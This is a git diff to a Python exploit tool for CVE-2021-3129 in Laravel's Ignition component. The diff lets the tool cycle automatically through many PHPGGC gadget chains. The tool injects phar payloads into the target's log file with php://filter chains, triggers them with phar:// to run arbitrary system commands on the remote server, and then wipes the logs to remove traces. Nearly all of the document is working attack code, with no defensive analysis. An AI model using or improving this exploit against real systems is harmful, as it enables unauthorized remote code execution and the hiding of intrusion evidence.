diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py index 151db86..ea9d13f 100644 --- a/CVE-2021-3129.py +++ b/CVE-2021-3129.py @@ -7,11 +7,12 @@ import base64 import zipfile import stat -import json import pkg_resources import re import subprocess import readline +import shutil + PURPLE = '\033[95m' CYAN = '\033[96m' @@ -24,6 +25,11 @@ UNDERLINE = '\033[4m' END = '\033[0m' + +CHAINS = ["laravel/rce1", "laravel/rce2", "laravel/rce3", "laravel/rce4", + "laravel/rce7", "laravel/rce8", "monolog/rce1", "monolog/rce2", "monolog/rce3", + "monolog/rce5", "monolog/rce6", "monolog/rce7"] + USER_AGENTS = [ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4", @@ -39,7 +45,7 @@ class Main: - def __init__(self, host, force=False, log_path=None, useragent=False, chain="monolog/rce1", php_executable="php"): + def __init__(self, host, force=False, log_path=None, useragent=False, chain=None, php_executable="php"): self.host = host self.force = force self.log_path = log_path @@ -97,69 +103,75 @@ def cmd_clear_logs(self): def cmd_execute_cmd(self, cmd): print(DARKCYAN + f"[@] Executing command \"{cmd}\"...") - payload = self.generate_payload(cmd, 16) + payloads = self.generate_payloads(cmd, 16) - print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing. - if self.exploit_clear_logs().status_code != 200: - print(RED + "[!] Failed clearing logs.") - exit(1) - print(GREEN + "[√] Cleared logs.") + i = 0 + for payload in payloads: + i = i+1 + print(f"{PURPLE}[@] Trying chain {payload['name']} [{i}/{len(payloads)}]...") - print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file. - if self.exploit_cause_error().status_code != 500: - print(RED + "[!] Failed causing error.") + print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing. self.exploit_clear_logs() - exit(1) - print(GREEN + "[√] Caused error in logs.") - print(BLUE + "[@] Sending payload...") - if self.exploit_request(payload, - 500).status_code != 500: # Step 3. Cause error with payload so payload in log file. - print(RED + "[!] Failed sending payload.") - self.exploit_clear_logs() - exit(1) - print(GREEN + "[√] Sent payload.") + print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file. + if self.exploit_cause_error().status_code != 500: + print(RED + "[!] Failed causing error.") + self.exploit_clear_logs() + else: + print(GREEN + "[√] Caused error in logs.") - print(BLUE + "[@] Converting payload...") # Step 4. Change te log file into the payload in the log file. - if (self.exploit_request( - f"php://filter/read=convert.quoted-printable-decode|" - f"convert.iconv.utf-16le.utf-8|" - f"convert.base64-decode/resource={self.log_path}", - 200).status_code != 200): - print(RED + "[!] Failed converting payload.") - self.exploit_clear_logs() - exit(1) - print(GREEN + "[√] Converted payload.") + print(BLUE + "[@] Sending payloads...") - exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script. - if exploited.status_code == 500 and "cannot be empty" in exploited.text: - print(GREEN + "[√] Result:") - result = exploited.text.split("")[1] - print(END + result) - else: - error_search = r"🧨 (.*?)<\/title>" - error_result = re.search(error_search, exploited.text) - if error_result: - print(RED + f"[!] Failed execution of payload.\nError: \"{error_result[1]}\"") + if self.exploit_request(payload['data'], + 500).status_code != 500: # Step 3. Cause error with payload so payload in log file. + print(RED + "[!] Failed sending payload.") + self.exploit_clear_logs() + else: + print(GREEN + "[√] Sent payload.") + + print(BLUE + "[@] Converting payload...") # Step 4. Change te log file into the payload in the log file. + if (self.exploit_request( + f"php://filter/read=convert.quoted-printable-decode|" + f"convert.iconv.utf-16le.utf-8|" + f"convert.base64-decode/resource={self.log_path}", + 200).status_code != 200): + print(RED + "[!] Failed converting payload.") + self.exploit_clear_logs() else: - print(RED + "[!] Failed execution of payload.") + print(GREEN + "[√] Converted payload.") + exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script. + if exploited.status_code == 500 and "cannot be empty" in exploited.text: + print(GREEN + "[√] Result:") + result = exploited.text.split("</html>")[1] + print(END + result) + + print(BLUE + "[@] Clearing logs...") # Step 6. Remove logs so phar is not downloadable/executable. + else: + error_search = r"<title>🧨 (.*?)<\/title>" + error_result = re.search(error_search, exploited.text) + if error_result: + print(RED + f"[!] Failed execution of payload.\nError: \"{error_result[1]}\".") + else: + print(RED + "[!] Failed execution of payload.") + + self.exploit_clear_logs() + self.exploit_clear_logs() + + if i < len(payloads): + next_chain = input(PURPLE + "[?] Do you want to try the next chain? [Y/N] : ") + if next_chain.lower() == "y" or next_chain.lower() == "yes": + continue + else: + break - print(BLUE + "[@] Clearing logs...") # Step 6. Remove logs so phar is not downloadable/executable. - if self.exploit_clear_logs().status_code != 200: - print(RED + "[!] Failed clearing logs.") - exit(1) - print(GREEN + "[√] Cleared logs.") def cmd_execute_write(self, text): print(DARKCYAN + f"[@] Writing to log file: \"{text}\"...") payload = self.generate_write_payload(text, 16) print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing. - if self.exploit_clear_logs().status_code != 200: - print(RED + "[!] Failed clearing logs.") - exit(1) - print(GREEN + "[√] Cleared logs.") + self.exploit_clear_logs() print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file. if self.exploit_cause_error().status_code != 500: @@ -184,7 +196,8 @@ def cmd_execute_write(self, text): print(GREEN + "[√] Converted payload.") def exploit_clear_logs(self) -> requests.Response: # Clear entire log file - return self.exploit_request(f"php://filter/read=consumed/resource={self.log_path}", 200) + return self.exploit_request(f"php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={self.log_path}", 200, True) + # return self.exploit_request(f"php://filter/read=consumed/resource={self.log_path}", 200) def exploit_cause_error(self) -> requests.Response: # Cause error by sending path parameter return self.exploit_request("AA", 500) @@ -218,8 +231,9 @@ def setup_phpggc(self): # Remove extracted zip file os.unlink(zip_path) - def generate_payload(self, command: str, padding=0) -> str: - print(DARKCYAN + f"[@] Generating payload...") + def generate_payloads(self, command: str, padding=0) -> list: + payloads = [] + print(DARKCYAN + f"[@] Generating payloads...") # Prepare command if '/' in command: @@ -241,26 +255,31 @@ def generate_payload(self, command: str, padding=0) -> str: self.setup_phpggc() # Build payload - os.system( - f"{self.php_executable} -d'phar.readonly=0' ./phpggc-master/phpggc {self.chain} system '{command}' --phar phar -o ./tmp.phar") + if os.path.exists("./.tmp"): + shutil.rmtree("./.tmp") + os.mkdir("./.tmp") - if not os.path.exists("./tmp.phar"): - print(RED + "[!] Failed to generate phar file.") - exit(1) + chains = CHAINS if self.chain == None else [self.chain] + for chain in chains: + phar_name = chain.replace("/", "-") + ".phar" + phar_path = f"./.tmp/{phar_name}" - # Prepare/encode payload - payload = open("./tmp.phar", 'rb').read() - payload = base64.b64encode(payload).decode().rstrip('=') - payload = ''.join(c + '=00' for c in payload) - payload = 'A' * padding + payload - payload = payload.replace("\n", "") + "A" + os.system(f"{self.php_executable} -d'phar.readonly=0' ./phpggc-master/phpggc {chain} system '{command}' --phar phar -o {phar_path}") - # Delete temporary files - if os.path.exists('./tmp.phar'): - os.unlink("./tmp.phar") + if os.path.exists(phar_path): + payload = open(phar_path, 'rb').read() + payload = base64.b64encode(payload).decode().rstrip('=') + payload = ''.join(c + '=00' for c in payload) + payload = 'A' * padding + payload + payload = payload.replace("\n", "") + "A" - print(GREEN + f"[√] Generated payload.") - return payload + payloads.append({"data": payload, "name": chain}) + + # Delete temporary files + os.unlink(phar_path) + + print(GREEN + f"[√] Generated {len(payloads)} payloads.") + return payloads def generate_write_payload(self, text: str, padding=0) -> str: print(DARKCYAN + f"[@] Generating payload...") @@ -273,7 +292,7 @@ def generate_write_payload(self, text: str, padding=0) -> str: print(GREEN + f"[√] Generated payload.") return payload - def exploit_request(self, value: str, expected_response: int = 200) -> requests.Response: + def exploit_request(self, value: str, expected_response: int = 200, silent=False) -> requests.Response: data = { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { @@ -288,9 +307,13 @@ def exploit_request(self, value: str, expected_response: int = 200) -> requests. } request = self.session.post(url=f"{self.host}_ignition/execute-solution", json=data, headers=headers, verify=False) - if request.status_code != expected_response: - print( - RED + f"[!] Exploit request returned status code {request.status_code}. Expected {expected_response}.") + if request.status_code != expected_response and not silent: + error_search = r"<title>🧨 (.*?)<\/title>" + error_result = re.search(error_search, request.text) + if error_result: + print(RED + f"[!] Exploit request returned status code {request.status_code}. Expected {expected_response}.\nError: \"{error_result[1]}\"") + else: + print(RED + f"[!] Exploit request returned status code {request.status_code}. Expected {expected_response}.") # Check if host has patched vulnerability if "runnable solutions are disabled in non-local environments" in request.text.lower(): @@ -414,7 +437,7 @@ def validate_url(url: str) -> bool: # https://stackoverflow.com/a/7160778 parser.add_argument('--ua', help='Randomize User-Agent for requests', required=False, default=False, action='store_true') parser.add_argument('--chain', help=f"Select PHPGGC chain. Use \"--chains\" parameter to view all available chains.", - required=False, default="monolog/rce1") + required=False, default=None) parser.add_argument('--chains', help='View available chains for the \"--chain\" parameter', required=False, default=False, action='store_true') parser.add_argument('--php', help='Path to PHP executable', required=False, default="php") @@ -422,9 +445,6 @@ def validate_url(url: str) -> bool: # https://stackoverflow.com/a/7160778 args = parser.parse_args() # Chains - chains = ["laravel/rce1", "laravel/rce2", "laravel/rce3", "laravel/rce4", "laravel/rce5", "laravel/rce6", - "laravel/rce7", "laravel/rce8", "monolog/rce1", "monolog/rce2", "monolog/rce3", "monolog/rce4", - "monolog/rce5", "monolog/rce6", "monolog/rce7"] if args.chains: print( f"{RED}[•] Available chains (Updated: 19 April 2022):\n" @@ -450,16 +470,18 @@ def validate_url(url: str) -> bool: # https://stackoverflow.com/a/7160778 # Validate before scan start if args.host is None: - print(RED + "[!] Parameter \"--host\" is required.") - exit() + args.host = input(f"{BLUE}[?] Enter host (e.g. https://example.com/){DARKCYAN} : ") if args.host[-1] != "/": args.host = args.host + "/" + if args.host[0:7] != "http://" and args.host[0:8] != "https://": + args.host = f"http://{args.host}" + if not validate_url(args.host): print(RED + "[!] Parameter \"--host\" is invalid. Please use a valid url (e.g. https://example.com/)") exit() - if args.chain.lower() not in chains: + if args.chain != None and args.chain.lower() not in CHAINS: print(RED + f"[!] Parameter \"--chain\" is invalid. Please check \"{sys.executable} {os.path.basename(__file__)} --chains\".") exit() diff --git a/README.md b/README.md index da68cfa..02cf023 100644 --- a/README.md +++ b/README.md @@ -92,8 +92,5 @@ webpack.mix.js [√] Cleared logs. ``` -## Future: -- [ ] Automatically determine PHPGCC chain if version detected while scanning. - ## Credits - [PHPGGC](https://github.com/ambionics/phpggc) \ No newline at end of file